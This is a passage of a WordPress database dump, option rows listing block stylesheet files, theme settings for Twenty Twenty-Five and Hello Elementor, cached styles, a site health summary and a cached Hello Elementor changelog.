"comment-content/style.css\";i:99;s:29:\"comment-content/style.min.css\";i:100;s:26:\"comment-date/style-rtl.css\";i:101;s:30:\"comment-date/style-rtl.min.css\";i:102;s:22:\"comment-date/style.css\";i:103;s:26:\"comment-date/style.min.css\";i:104;s:31:\"comment-edit-link/style-rtl.css\";i:105;s:35:\"comment-edit-link/style-rtl.min.css\";i:106;s:27:\"comment-edit-link/style.css\";i:107;s:31:\"comment-edit-link/style.min.css\";i:108;s:32:\"comment-reply-link/style-rtl.css\";i:109;s:36:\"comment-reply-link/style-rtl.min.css\";i:110;s:28:\"comment-reply-link/style.css\";i:111;s:32:\"comment-reply-link/style.min.css\";i:112;s:30:\"comment-template/style-rtl.css\";i:113;s:34:\"comment-template/style-rtl.min.css\";i:114;s:26:\"comment-template/style.css\";i:115;s:30:\"comment-template/style.min.css\";i:116;s:42:\"comments-pagination-numbers/editor-rtl.css\";i:117;s:46:\"comments-pagination-numbers/editor-rtl.min.css\";i:118;s:38:\"comments-pagination-numbers/editor.css\";i:119;s:42:\"comments-pagination-numbers/editor.min.css\";i:120;s:34:\"comments-pagination/editor-rtl.css\";i:121;s:38:\"comments-pagination/editor-rtl.min.css\";i:122;s:30:\"comments-pagination/editor.css\";i:123;s:34:\"comments-pagination/editor.min.css\";i:124;s:33:\"comments-pagination/style-rtl.css\";i:125;s:37:\"comments-pagination/style-rtl.min.css\";i:126;s:29:\"comments-pagination/style.css\";i:127;s:33:\"comments-pagination/style.min.css\";i:128;s:29:\"comments-title/editor-rtl.css\";i:129;s:33:\"comments-title/editor-rtl.min.css\";i:130;s:25:\"comments-title/editor.css\";i:131;s:29:\"comments-title/editor.min.css\";i:132;s:23:\"comments/editor-rtl.css\";i:133;s:27:\"comments/editor-rtl.min.css\";i:134;s:19:\"comments/editor.css\";i:135;s:23:\"comments/editor.min.css\";i:136;s:22:\"comments/style-rtl.css\";i:137;s:26:\"comments/style-rtl.min.css\";i:138;s:18:\"comments/style.css\";i:139;s:22:\"comments/style.min.css\";i:140;s:20:\"cover/editor-rtl.css\";i:141;s:24:\"cover/editor-rtl.min.css\";i:142;s:16:\"cover/editor.css\";i:143;s:20:\"cover/editor.min.css\";i:144;s:19:\"cover/style-rtl.css\";i:145;s:23:\"cover/style-rtl.min.css\";i:146;s:15:\"cover/style.css\";i:147;s:19:\"cover/style.min.css\";i:148;s:22:\"details/editor-rtl.css\";i:149;s:26:\"details/editor-rtl.min.css\";i:150;s:18:\"details/editor.css\";i:151;s:22:\"details/editor.min.css\";i:152;s:21:\"details/style-rtl.css\";i:153;s:25:\"details/style-rtl.min.css\";i:154;s:17:\"details/style.css\";i:155;s:21:\"details/style.min.css\";i:156;s:20:\"embed/editor-rtl.css\";i:157;s:24:\"embed/editor-rtl.min.css\";i:158;s:16:\"embed/editor.css\";i:159;s:20:\"embed/editor.min.css\";i:160;s:19:\"embed/style-rtl.css\";i:161;s:23:\"embed/style-rtl.min.css\";i:162;s:15:\"embed/style.css\";i:163;s:19:\"embed/style.min.css\";i:164;s:19:\"embed/theme-rtl.css\";i:165;s:23:\"embed/theme-rtl.min.css\";i:166;s:15:\"embed/theme.css\";i:167;s:19:\"embed/theme.min.css\";i:168;s:19:\"file/editor-rtl.css\";i:169;s:23:\"file/editor-rtl.min.css\";i:170;s:15:\"file/editor.css\";i:171;s:19:\"file/editor.min.css\";i:172;s:18:\"file/style-rtl.css\";i:173;s:22:\"file/style-rtl.min.css\";i:174;s:14:\"file/style.css\";i:175;s:18:\"file/style.min.css\";i:176;s:23:\"footnotes/style-rtl.css\";i:177;s:27:\"footnotes/style-rtl.min.css\";i:178;s:19:\"footnotes/style.css\";i:179;s:23:\"footnotes/style.min.css\";i:180;s:23:\"freeform/editor-rtl.css\";i:181;s:27:\"freeform/editor-rtl.min.css\";i:182;s:19:\"freeform/editor.css\";i:183;s:23:\"freeform/editor.min.css\";i:184;s:22:\"gallery/editor-rtl.css\";i:185;s:26:\"gallery/editor-rtl.min.css\";i:186;s:18:\"gallery/editor.css\";i:187;s:22:\"gallery/editor.min.css\";i:188;s:21:\"gallery/style-rtl.css\";i:189;s:25:\"gallery/style-rtl.min.css\";i:190;s:17:\"gallery/style.css\";i:191;s:21:\"gallery/style.min.css\";i:192;s:21:\"gallery/theme-rtl.css\";i:193;s:25:\"gallery/theme-rtl.min.css\";i:194;s:17:\"gallery/theme.css\";i:195;s:21:\"gallery/theme.min.css\";i:196;s:20:\"group/editor-rtl.css\";i:197;s:24:\"group/editor-rtl.min.css\";i:198;s:16:\"group/editor.css\";i:199;s:20:\"group/editor.min.css\";i:200;s:19:\"group/style-rtl.css\";i:201;s:23:\"group/style-rtl.min.css\";i:202;s:15:\"group/style.css\";i:203;s:19:\"group/style.min.css\";i:204;s:19:\"group/theme-rtl.css\";i:205;s:23:\"group/theme-rtl.min.css\";i:206;s:15:\"group/theme.css\";i:207;s:19:\"group/theme.min.css\";i:208;s:21:\"heading/style-rtl.css\";i:209;s:25:\"heading/style-rtl.min.css\";i:210;s:17:\"heading/style.css\";i:211;s:21:\"heading/style.min.css\";i:212;s:19:\"html/editor-rtl.css\";i:213;s:23:\"html/editor-rtl.min.css\";i:214;s:15:\"html/editor.css\";i:215;s:19:\"html/editor.min.css\";i:216;s:20:\"image/editor-rtl.css\";i:217;s:24:\"image/editor-rtl.min.css\";i:218;s:16:\"image/editor.css\";i:219;s:20:\"image/editor.min.css\";i:220;s:19:\"image/style-rtl.css\";i:221;s:23:\"image/style-rtl.min.css\";i:222;s:15:\"image/style.css\";i:223;s:19:\"image/style.min.css\";i:224;s:19:\"image/theme-rtl.css\";i:225;s:23:\"image/theme-rtl.min.css\";i:226;s:15:\"image/theme.css\";i:227;s:19:\"image/theme.min.css\";i:228;s:29:\"latest-comments/style-rtl.css\";i:229;s:33:\"latest-comments/style-rtl.min.css\";i:230;s:25:\"latest-comments/style.css\";i:231;s:29:\"latest-comments/style.min.css\";i:232;s:27:\"latest-posts/editor-rtl.css\";i:233;s:31:\"latest-posts/editor-rtl.min.css\";i:234;s:23:\"latest-posts/editor.css\";i:235;s:27:\"latest-posts/editor.min.css\";i:236;s:26:\"latest-posts/style-rtl.css\";i:237;s:30:\"latest-posts/style-rtl.min.css\";i:238;s:22:\"latest-posts/style.css\";i:239;s:26:\"latest-posts/style.min.css\";i:240;s:18:\"list/style-rtl.css\";i:241;s:22:\"list/style-rtl.min.css\";i:242;s:14:\"list/style.css\";i:243;s:18:\"list/style.min.css\";i:244;s:22:\"loginout/style-rtl.css\";i:245;s:26:\"loginout/style-rtl.min.css\";i:246;s:18:\"loginout/style.css\";i:247;s:22:\"loginout/style.min.css\";i:248;s:19:\"math/editor-rtl.css\";i:249;s:23:\"math/editor-rtl.min.css\";i:250;s:15:\"math/editor.css\";i:251;s:19:\"math/editor.min.css\";i:252;s:18:\"math/style-rtl.css\";i:253;s:22:\"math/style-rtl.min.css\";i:254;s:14:\"math/style.css\";i:255;s:18:\"math/style.min.css\";i:256;s:25:\"media-text/editor-rtl.css\";i:257;s:29:\"media-text/editor-rtl.min.css\";i:258;s:21:\"media-text/editor.css\";i:259;s:25:\"media-text/editor.min.css\";i:260;s:24:\"media-text/style-rtl.css\";i:261;s:28:\"media-text/style-rtl.min.css\";i:262;s:20:\"media-text/style.css\";i:263;s:24:\"media-text/style.min.css\";i:264;s:19:\"more/editor-rtl.css\";i:265;s:23:\"more/editor-rtl.min.css\";i:266;s:15:\"more/editor.css\";i:267;s:19:\"more/editor.min.css\";i:268;s:30:\"navigation-link/editor-rtl.css\";i:269;s:34:\"navigation-link/editor-rtl.min.css\";i:270;s:26:\"navigation-link/editor.css\";i:271;s:30:\"navigation-link/editor.min.css\";i:272;s:29:\"navigation-link/style-rtl.css\";i:273;s:33:\"navigation-link/style-rtl.min.css\";i:274;s:25:\"navigation-link/style.css\";i:275;s:29:\"navigation-link/style.min.css\";i:276;s:33:\"navigation-submenu/editor-rtl.css\";i:277;s:37:\"navigation-submenu/editor-rtl.min.css\";i:278;s:29:\"navigation-submenu/editor.css\";i:279;s:33:\"navigation-submenu/editor.min.css\";i:280;s:25:\"navigation/editor-rtl.css\";i:281;s:29:\"navigation/editor-rtl.min.css\";i:282;s:21:\"navigation/editor.css\";i:283;s:25:\"navigation/editor.min.css\";i:284;s:24:\"navigation/style-rtl.css\";i:285;s:28:\"navigation/style-rtl.min.css\";i:286;s:20:\"navigation/style.css\";i:287;s:24:\"navigation/style.min.css\";i:288;s:23:\"nextpage/editor-rtl.css\";i:289;s:27:\"nextpage/editor-rtl.min.css\";i:290;s:19:\"nextpage/editor.css\";i:291;s:23:\"nextpage/editor.min.css\";i:292;s:24:\"page-list/editor-rtl.css\";i:293;s:28:\"page-list/editor-rtl.min.css\";i:294;s:20:\"page-list/editor.css\";i:295;s:24:\"page-list/editor.min.css\";i:296;s:23:\"page-list/style-rtl.css\";i:297;s:27:\"page-list/style-rtl.min.css\";i:298;s:19:\"page-list/style.css\";i:299;s:23:\"page-list/style.min.css\";i:300;s:24:\"paragraph/editor-rtl.css\";i:301;s:28:\"paragraph/editor-rtl.min.css\";i:302;s:20:\"paragraph/editor.css\";i:303;s:24:\"paragraph/editor.min.css\";i:304;s:23:\"paragraph/style-rtl.css\";i:305;s:27:\"paragraph/style-rtl.min.css\";i:306;s:19:\"paragraph/style.css\";i:307;s:23:\"paragraph/style.min.css\";i:308;s:35:\"post-author-biography/style-rtl.css\";i:309;s:39:\"post-author-biography/style-rtl.min.css\";i:310;s:31:\"post-author-biography/style.css\";i:311;s:35:\"post-author-biography/style.min.css\";i:312;s:30:\"post-author-name/style-rtl.css\";i:313;s:34:\"post-author-name/style-rtl.min.css\";i:314;s:26:\"post-author-name/style.css\";i:315;s:30:\"post-author-name/style.min.css\";i:316;s:25:\"post-author/style-rtl.css\";i:317;s:29:\"post-author/style-rtl.min.css\";i:318;s:21:\"post-author/style.css\";i:319;s:25:\"post-author/style.min.css\";i:320;s:33:\"post-comments-count/style-rtl.css\";i:321;s:37:\"post-comments-count/style-rtl.min.css\";i:322;s:29:\"post-comments-count/style.css\";i:323;s:33:\"post-comments-count/style.min.css\";i:324;s:33:\"post-comments-form/editor-rtl.css\";i:325;s:37:\"post-comments-form/editor-rtl.min.css\";i:326;s:29:\"post-comments-form/editor.css\";i:327;s:33:\"post-comments-form/editor.min.css\";i:328;s:32:\"post-comments-form/style-rtl.css\";i:329;s:36:\"post-comments-form/style-rtl.min.css\";i:330;s:28:\"post-comments-form/style.css\";i:331;s:32:\"post-comments-form/style.min.css\";i:332;s:32:\"post-comments-link/style-rtl.css\";i:333;s:36:\"post-comments-link/style-rtl.min.css\";i:334;s:28:\"post-comments-link/style.css\";i:335;s:32:\"post-comments-link/style.min.css\";i:336;s:26:\"post-content/style-rtl.css\";i:337;s:30:\"post-content/style-rtl.min.css\";i:338;s:22:\"post-content/style.css\";i:339;s:26:\"post-content/style.min.css\";i:340;s:23:\"post-date/style-rtl.css\";i:341;s:27:\"post-date/style-rtl.min.css\";i:342;s:19:\"post-date/style.css\";i:343;s:23:\"post-date/style.min.css\";i:344;s:27:\"post-excerpt/editor-rtl.css\";i:345;s:31:\"post-excerpt/editor-rtl.min.css\";i:346;s:23:\"post-excerpt/editor.css\";i:347;s:27:\"post-excerpt/editor.min.css\";i:348;s:26:\"post-excerpt/style-rtl.css\";i:349;s:30:\"post-excerpt/style-rtl.min.css\";i:350;s:22:\"post-excerpt/style.css\";i:351;s:26:\"post-excerpt/style.min.css\";i:352;s:34:\"post-featured-image/editor-rtl.css\";i:353;s:38:\"post-featured-image/editor-rtl.min.css\";i:354;s:30:\"post-featured-image/editor.css\";i:355;s:34:\"post-featured-image/editor.min.css\";i:356;s:33:\"post-featured-image/style-rtl.css\";i:357;s:37:\"post-featured-image/style-rtl.min.css\";i:358;s:29:\"post-featured-image/style.css\";i:359;s:33:\"post-featured-image/style.min.css\";i:360;s:34:\"post-navigation-link/style-rtl.css\";i:361;s:38:\"post-navigation-link/style-rtl.min.css\";i:362;s:30:\"post-navigation-link/style.css\";i:363;s:34:\"post-navigation-link/style.min.css\";i:364;s:27:\"post-template/style-rtl.css\";i:365;s:31:\"post-template/style-rtl.min.css\";i:366;s:23:\"post-template/style.css\";i:367;s:27:\"post-template/style.min.css\";i:368;s:24:\"post-terms/style-rtl.css\";i:369;s:28:\"post-terms/style-rtl.min.css\";i:370;s:20:\"post-terms/style.css\";i:371;s:24:\"post-terms/style.min.css\";i:372;s:31:\"post-time-to-read/style-rtl.css\";i:373;s:35:\"post-time-to-read/style-rtl.min.css\";i:374;s:27:\"post-time-to-read/style.css\";i:375;s:31:\"post-time-to-read/style.min.css\";i:376;s:24:\"post-title/style-rtl.css\";i:377;s:28:\"post-title/style-rtl.min.css\";i:378;s:20:\"post-title/style.css\";i:379;s:24:\"post-title/style.min.css\";i:380;s:26:\"preformatted/style-rtl.css\";i:381;s:30:\"preformatted/style-rtl.min.css\";i:382;s:22:\"preformatted/style.css\";i:383;s:26:\"preformatted/style.min.css\";i:384;s:24:\"pullquote/editor-rtl.css\";i:385;s:28:\"pullquote/editor-rtl.min.css\";i:386;s:20:\"pullquote/editor.css\";i:387;s:24:\"pullquote/editor.min.css\";i:388;s:23:\"pullquote/style-rtl.css\";i:389;s:27:\"pullquote/style-rtl.min.css\";i:390;s:19:\"pullquote/style.css\";i:391;s:23:\"pullquote/style.min.css\";i:392;s:23:\"pullquote/theme-rtl.css\";i:393;s:27:\"pullquote/theme-rtl.min.css\";i:394;s:19:\"pullquote/theme.css\";i:395;s:23:\"pullquote/theme.min.css\";i:396;s:39:\"query-pagination-numbers/editor-rtl.css\";i:397;s:43:\"query-pagination-numbers/editor-rtl.min.css\";i:398;s:35:\"query-pagination-numbers/editor.css\";i:399;s:39:\"query-pagination-numbers/editor.min.css\";i:400;s:31:\"query-pagination/editor-rtl.css\";i:401;s:35:\"query-pagination/editor-rtl.min.css\";i:402;s:27:\"query-pagination/editor.css\";i:403;s:31:\"query-pagination/editor.min.css\";i:404;s:30:\"query-pagination/style-rtl.css\";i:405;s:34:\"query-pagination/style-rtl.min.css\";i:406;s:26:\"query-pagination/style.css\";i:407;s:30:\"query-pagination/style.min.css\";i:408;s:25:\"query-title/style-rtl.css\";i:409;s:29:\"query-title/style-rtl.min.css\";i:410;s:21:\"query-title/style.css\";i:411;s:25:\"query-title/style.min.css\";i:412;s:25:\"query-total/style-rtl.css\";i:413;s:29:\"query-total/style-rtl.min.css\";i:414;s:21:\"query-total/style.css\";i:415;s:25:\"query-total/style.min.css\";i:416;s:20:\"query/editor-rtl.css\";i:417;s:24:\"query/editor-rtl.min.css\";i:418;s:16:\"query/editor.css\";i:419;s:20:\"query/editor.min.css\";i:420;s:19:\"quote/style-rtl.css\";i:421;s:23:\"quote/style-rtl.min.css\";i:422;s:15:\"quote/style.css\";i:423;s:19:\"quote/style.min.css\";i:424;s:19:\"quote/theme-rtl.css\";i:425;s:23:\"quote/theme-rtl.min.css\";i:426;s:15:\"quote/theme.css\";i:427;s:19:\"quote/theme.min.css\";i:428;s:23:\"read-more/style-rtl.css\";i:429;s:27:\"read-more/style-rtl.min.css\";i:430;s:19:\"read-more/style.css\";i:431;s:23:\"read-more/style.min.css\";i:432;s:18:\"rss/editor-rtl.css\";i:433;s:22:\"rss/editor-rtl.min.css\";i:434;s:14:\"rss/editor.css\";i:435;s:18:\"rss/editor.min.css\";i:436;s:17:\"rss/style-rtl.css\";i:437;s:21:\"rss/style-rtl.min.css\";i:438;s:13:\"rss/style.css\";i:439;s:17:\"rss/style.min.css\";i:440;s:21:\"search/editor-rtl.css\";i:441;s:25:\"search/editor-rtl.min.css\";i:442;s:17:\"search/editor.css\";i:443;s:21:\"search/editor.min.css\";i:444;s:20:\"search/style-rtl.css\";i:445;s:24:\"search/style-rtl.min.css\";i:446;s:16:\"search/style.css\";i:447;s:20:\"search/style.min.css\";i:448;s:20:\"search/theme-rtl.css\";i:449;s:24:\"search/theme-rtl.min.css\";i:450;s:16:\"search/theme.css\";i:451;s:20:\"search/theme.min.css\";i:452;s:24:\"separator/editor-rtl.css\";i:453;s:28:\"separator/editor-rtl.min.css\";i:454;s:20:\"separator/editor.css\";i:455;s:24:\"separator/editor.min.css\";i:456;s:23:\"separator/style-rtl.css\";i:457;s:27:\"separator/style-rtl.min.css\";i:458;s:19:\"separator/style.css\";i:459;s:23:\"separator/style.min.css\";i:460;s:23:\"separator/theme-rtl.css\";i:461;s:27:\"separator/theme-rtl.min.css\";i:462;s:19:\"separator/theme.css\";i:463;s:23:\"separator/theme.min.css\";i:464;s:24:\"shortcode/editor-rtl.css\";i:465;s:28:\"shortcode/editor-rtl.min.css\";i:466;s:20:\"shortcode/editor.css\";i:467;s:24:\"shortcode/editor.min.css\";i:468;s:24:\"site-logo/editor-rtl.css\";i:469;s:28:\"site-logo/editor-rtl.min.css\";i:470;s:20:\"site-logo/editor.css\";i:471;s:24:\"site-logo/editor.min.css\";i:472;s:23:\"site-logo/style-rtl.css\";i:473;s:27:\"site-logo/style-rtl.min.css\";i:474;s:19:\"site-logo/style.css\";i:475;s:23:\"site-logo/style.min.css\";i:476;s:27:\"site-tagline/editor-rtl.css\";i:477;s:31:\"site-tagline/editor-rtl.min.css\";i:478;s:23:\"site-tagline/editor.css\";i:479;s:27:\"site-tagline/editor.min.css\";i:480;s:26:\"site-tagline/style-rtl.css\";i:481;s:30:\"site-tagline/style-rtl.min.css\";i:482;s:22:\"site-tagline/style.css\";i:483;s:26:\"site-tagline/style.min.css\";i:484;s:25:\"site-title/editor-rtl.css\";i:485;s:29:\"site-title/editor-rtl.min.css\";i:486;s:21:\"site-title/editor.css\";i:487;s:25:\"site-title/editor.min.css\";i:488;s:24:\"site-title/style-rtl.css\";i:489;s:28:\"site-title/style-rtl.min.css\";i:490;s:20:\"site-title/style.css\";i:491;s:24:\"site-title/style.min.css\";i:492;s:26:\"social-link/editor-rtl.css\";i:493;s:30:\"social-link/editor-rtl.min.css\";i:494;s:22:\"social-link/editor.css\";i:495;s:26:\"social-link/editor.min.css\";i:496;s:27:\"social-links/editor-rtl.css\";i:497;s:31:\"social-links/editor-rtl.min.css\";i:498;s:23:\"social-links/editor.css\";i:499;s:27:\"social-links/editor.min.css\";i:500;s:26:\"social-links/style-rtl.css\";i:501;s:30:\"social-links/style-rtl.min.css\";i:502;s:22:\"social-links/style.css\";i:503;s:26:\"social-links/style.min.css\";i:504;s:21:\"spacer/editor-rtl.css\";i:505;s:25:\"spacer/editor-rtl.min.css\";i:506;s:17:\"spacer/editor.css\";i:507;s:21:\"spacer/editor.min.css\";i:508;s:20:\"spacer/style-rtl.css\";i:509;s:24:\"spacer/style-rtl.min.css\";i:510;s:16:\"spacer/style.css\";i:511;s:20:\"spacer/style.min.css\";i:512;s:20:\"table/editor-rtl.css\";i:513;s:24:\"table/editor-rtl.min.css\";i:514;s:16:\"table/editor.css\";i:515;s:20:\"table/editor.min.css\";i:516;s:19:\"table/style-rtl.css\";i:517;s:23:\"table/style-rtl.min.css\";i:518;s:15:\"table/style.css\";i:519;s:19:\"table/style.min.css\";i:520;s:19:\"table/theme-rtl.css\";i:521;s:23:\"table/theme-rtl.min.css\";i:522;s:15:\"table/theme.css\";i:523;s:19:\"table/theme.min.css\";i:524;s:24:\"tag-cloud/editor-rtl.css\";i:525;s:28:\"tag-cloud/editor-rtl.min.css\";i:526;s:20:\"tag-cloud/editor.css\";i:527;s:24:\"tag-cloud/editor.min.css\";i:528;s:23:\"tag-cloud/style-rtl.css\";i:529;s:27:\"tag-cloud/style-rtl.min.css\";i:530;s:19:\"tag-cloud/style.css\";i:531;s:23:\"tag-cloud/style.min.css\";i:532;s:28:\"template-part/editor-rtl.css\";i:533;s:32:\"template-part/editor-rtl.min.css\";i:534;s:24:\"template-part/editor.css\";i:535;s:28:\"template-part/editor.min.css\";i:536;s:27:\"template-part/theme-rtl.css\";i:537;s:31:\"template-part/theme-rtl.min.css\";i:538;s:23:\"template-part/theme.css\";i:539;s:27:\"template-part/theme.min.css\";i:540;s:24:\"term-count/style-rtl.css\";i:541;s:28:\"term-count/style-rtl.min.css\";i:542;s:20:\"term-count/style.css\";i:543;s:24:\"term-count/style.min.css\";i:544;s:30:\"term-description/style-rtl.css\";i:545;s:34:\"term-description/style-rtl.min.css\";i:546;s:26:\"term-description/style.css\";i:547;s:30:\"term-description/style.min.css\";i:548;s:23:\"term-name/style-rtl.css\";i:549;s:27:\"term-name/style-rtl.min.css\";i:550;s:19:\"term-name/style.css\";i:551;s:23:\"term-name/style.min.css\";i:552;s:28:\"term-template/editor-rtl.css\";i:553;s:32:\"term-template/editor-rtl.min.css\";i:554;s:24:\"term-template/editor.css\";i:555;s:28:\"term-template/editor.min.css\";i:556;s:27:\"term-template/style-rtl.css\";i:557;s:31:\"term-template/style-rtl.min.css\";i:558;s:23:\"term-template/style.css\";i:559;s:27:\"term-template/style.min.css\";i:560;s:27:\"text-columns/editor-rtl.css\";i:561;s:31:\"text-columns/editor-rtl.min.css\";i:562;s:23:\"text-columns/editor.css\";i:563;s:27:\"text-columns/editor.min.css\";i:564;s:26:\"text-columns/style-rtl.css\";i:565;s:30:\"text-columns/style-rtl.min.css\";i:566;s:22:\"text-columns/style.css\";i:567;s:26:\"text-columns/style.min.css\";i:568;s:19:\"verse/style-rtl.css\";i:569;s:23:\"verse/style-rtl.min.css\";i:570;s:15:\"verse/style.css\";i:571;s:19:\"verse/style.min.css\";i:572;s:20:\"video/editor-rtl.css\";i:573;s:24:\"video/editor-rtl.min.css\";i:574;s:16:\"video/editor.css\";i:575;s:20:\"video/editor.min.css\";i:576;s:19:\"video/style-rtl.css\";i:577;s:23:\"video/style-rtl.min.css\";i:578;s:15:\"video/style.css\";i:579;s:19:\"video/style.min.css\";i:580;s:19:\"video/theme-rtl.css\";i:581;s:23:\"video/theme-rtl.min.css\";i:582;s:15:\"video/theme.css\";i:583;s:19:\"video/theme.min.css\";}}','on'),(136,'theme_mods_twentytwentyfive','a:2:{s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1761045287;s:4:\"data\";a:3:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:3:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";}s:9:\"sidebar-2\";a:2:{i:0;s:7:\"block-5\";i:1;s:7:\"block-6\";}}}}','off'),(138,'_transient_wp_styles_for_blocks','a:2:{s:4:\"hash\";s:32:\"3841b38f3c45f5d392fbb4c224a2704a\";s:6:\"blocks\";a:9:{s:32:\"832dc2d864d79097d8b8b493ad93453b\";s:0:\"\";s:32:\"45d3e0c4afcbd8cf25cb1ba51abfb3d7\";s:46:\":root :where(.wp-block-icon svg){width: 24px;}\";s:32:\"feca6e996f694be2d29599793228e0d7\";s:0:\"\";s:32:\"5eef131663eddaf830554df656fc2968\";s:0:\"\";s:32:\"c99c05932c6685777ec5b856698fcc7d\";s:0:\"\";s:32:\"dec8d648f30b13caec8e61374591787d\";s:0:\"\";s:32:\"6c35533f7a92cce94808323603db9fc8\";s:0:\"\";s:32:\"6a0505cd5c78a87ed77570cda43c1132\";s:0:\"\";s:32:\"25a66f156386551185570f72a9f7d44e\";s:69:\":root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;}\";}}','on'),(143,'recovery_keys','a:0:{}','off'),(223,'_transient_health-check-site-status-result','{\"good\":18,\"recommended\":7,\"critical\":1}','on'),(937,'current_theme','Hello Elementor','auto'),(938,'theme_mods_hello-elementor','a:4:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:11:\"custom_logo\";i:366;}','on'),(939,'theme_switched','','auto'),(940,'hello_theme_version','3.5.1','auto'),(943,'elementor_connect_site_key','45c2b680b60bd84d39133fa64fa954f8','auto'),(944,'_hello-elementor_notifications','a:2:{s:7:\"timeout\";i:1788641970;s:5:\"value\";s:9625:\"[{\"id\":\"hello-theme-3.5.1\",\"title\":\"3.5.1 - 2026-08-25\",\"description\":\"\\n <ul>\\n <li>Fix: General fixes and improvements<\\/li>\\n <\\/ul>\"},{\"id\":\"hello-theme-3.5.0\",\"title\":\"3.5.0 - 2026-08-25\",\"description\":\"\\n <ul>\\n <li>Tweak: Updated Theme admin menu navigation<\\/li>\\n <li>Tweak: Updated WordPress compatibility to version 7.0<\\/li>\\n <li>Tweak: Improved keyboard focus visibility across interactive elements<\\/li>\\n <li>Fix: Submenu text may not be visible when the header menu color is set to white<\\/li>\\n <li>Fix: Prevent dropdown menus from overflowing the viewport on right-aligned menu items<\\/li>\\n <li>Fix: Prevent full-width blocks from causing horizontal scrolling<\\/li>\\n <li>Fix: Improve mobile menu accessibility and translation support<\\/li>\\n <\\/ul>\"},{\"id\":\"hello-theme-3.4.9\",\"title\":\"3.4.9 - 2026-05-20\",\"description\":\"\\n <ul>\\n <li>Fix: CSS improvements for Elementor widgets<\\/li>\\n <\\/ul>\"},{\"id\":\"hello-theme-3.4.8\",\"title\":\"3.4.8 - 2026-05-20\",\"description\":\"\\n <ul>\\n <li>Fix: CSS improvements for Elementor widgets<\\/li>\\n <\\/ul>\"},{\"id\":\"hello-theme-3.4.7\",\"title\":\"3.4.7 - 2026-03-16\",\"description\":\"\\n <ul>\\n <li>Tweak: Updated theme home page<\\/li>\\n <\\/ul>\"},{\"id\":\"hello-theme-3.4.6\",\"title\":\"3.4.6 - 2026-01-21\",\"description\":\"\\n <ul>\\n <li>Tweak: Updated Elementor assets<\\/li>\\n <\\/ul>\"},{\"id\":\"hello-theme-3.4.5\",\"title\":\"3.4.5 - 2025-10-27\",\"description\":\"\\n <ul>\\n\\t\\t\\t\\t<li>New: Add theme home to Finder<\\/li>\\n\\t\\t\\t\\t<li>Tweak: Improve banner behavior after clicking on action button<\\/li>\\n\\t\\t\\t\\t<li>Fix: Load styles correctly in Gutenberg pages<\\/li>\\n\\t\\t\\t\\t<li>Fix: Do not change menu name after Elementor activation<\\/li>\\n\\t\\t\\t\\t<li>Fix: Ensure quicklinks works correctly from home page<\\/li>\\n <\\/ul>\"},{\"id\":\"hello-theme-3.4.4\",\"title\":\"3.4.4 - 2025-06-08\",\"description\":\"\\n <ul>\\n\\t\\t\\t\\t<li>Tweak: Improve Header\\/Footer edit access from theme Home<\\/li>\\n <\\/ul>\"},{\"id\":\"hello-theme-3.4.3\",\"title\":\"3.4.3 - 2025-05-26\",\"description\":\"\\n <ul>\\n\\t\\t\\t\\t<li>Fix: Settings page empty after 3.4.0 in translated sites<\\/li>\\n\\t\\t\\t\\t<li>Fix: PHP 8.4 deprecation notice<\\/li>\\n <\\/ul>\"},{\"id\":\"hello-theme-3.4.2\",\"title\":\"3.4.2 - 2025-05-19\",\"description\":\"\\n <ul>\\n\\t\\t\\t\\t<li>Tweak: Set Home links font weight to regular<\\/li>\\n \\t\\t <li>Tweak: Dart SASS 3.0.0 - resolve scss deprecated warnings<\\/li>\\n \\t\\t <li>Fix: Settings page empty after 3.4.0<\\/li>\\n <\\/ul>\"},{\"id\":\"hello-theme-3.4.0\",\"title\":\"3.4.0 - 2025-05-05\",\"description\":\"\\n <ul>\\n <li>New: Added Theme Home<\\/li>\\n\\t\\t\\t\\t<li>Tweak: Update theme settings page style<\\/li>\\n\\t\\t\\t\\t<li>Tweak: Update tested up to version 6.8<\\/li>\\n <\\/ul>\"},{\"id\":\"hello-theme-3.3.0\",\"title\":\"3.3.0 - 2025-01-21\",\"description\":\"\\n <ul>\\n <li>Tweak: Added changelog link in theme settings<\\/li>\\n\\t\\t\\t\\t<li>Tweak: Updated minimum required Safari version to 15.5<\\/li>\\n \\t\\t <li>Tweak: Update autoprefixer to latest versions<\\/li>\\n <\\/ul>\"},{\"id\":\"hello-theme-3.2.1\",\"title\":\"3.2.1 - 2024-12-16\",\"description\":\"\\n <ul>\\n <li>\\n Fix: Gutenberg editor expanded disproportionately after adding support for <code>theme.json<\\/code>\\n (<a href=\\\"https:\\/\\/github.com\\/elementor\\/hello-theme\\/issues\\/430\\\" target=\\\"_blank\\\">#430<\\/a>)\\n <\\/li>\\n <li>Fix: Use CSS logical properties in the theme<\\/li>\\n <li>Fix: Add ARIA attributes to header nav menu<\\/li>\\n <\\/ul>\"},{\"id\":\"hello-theme-3.2.0\",\"title\":\"3.2.0 - 2024-12-15\",\"description\":\"\\n <ul>\\n <li>Tweak: Convert classic to hybrid theme with block-editor support<\\/li>\\n <li>Tweak: Added new design options to header\\/footer<\\/li>\\n <li>Tweak: Update <code>Tested up to 6.7<\\/code><\\/li>\\n <li>\\n Fix: Minify JS files\\n (<a href=\\\"https:\\/\\/github.com\\/elementor\\/hello-theme\\/issues\\/419\\\" target=\\\"_blank\\\">#419<\\/a>)\\n <\\/li>\\n <\\/ul>\"},{\"id\":\"hello-theme-3.1.1\",\"title\":\"3.1.1 - 2024-07-30\",\"description\":\"\\n <ul>\\n <li>Fix: Use consistent <code><h2><\\/code> for comments title and comment form<\\/li>\\n <\\/ul>\"},{\"id\":\"hello-theme-3.1.0\",\"title\":\"3.1.0 - 2024-06-19\",\"description\":\"\\n <ul>\\n <li>Tweak: Update <code>Requires PHP 7.4<\\/code><\\/li>\\n <li>Tweak: Update <code>Tested up to 6.5<\\/code><\\/li>\\n <li>Tweak: Add the ability to style the brand layout<\\/li>\\n <li>Tweak: Remove deprecated Elementor code<\\/li>\\n <li>Tweak: Restore default focus styling inside the theme<\\/li>\\n <li>Tweak: Add <code>aria-label<\\/code> attribute to various <code><nav><\\/code> elements<\\/li>\\n <li>Tweak: Improve mobile menu keyboard accessibility<\\/li>\\n <li>Tweak: Semantic mobile menu toggle 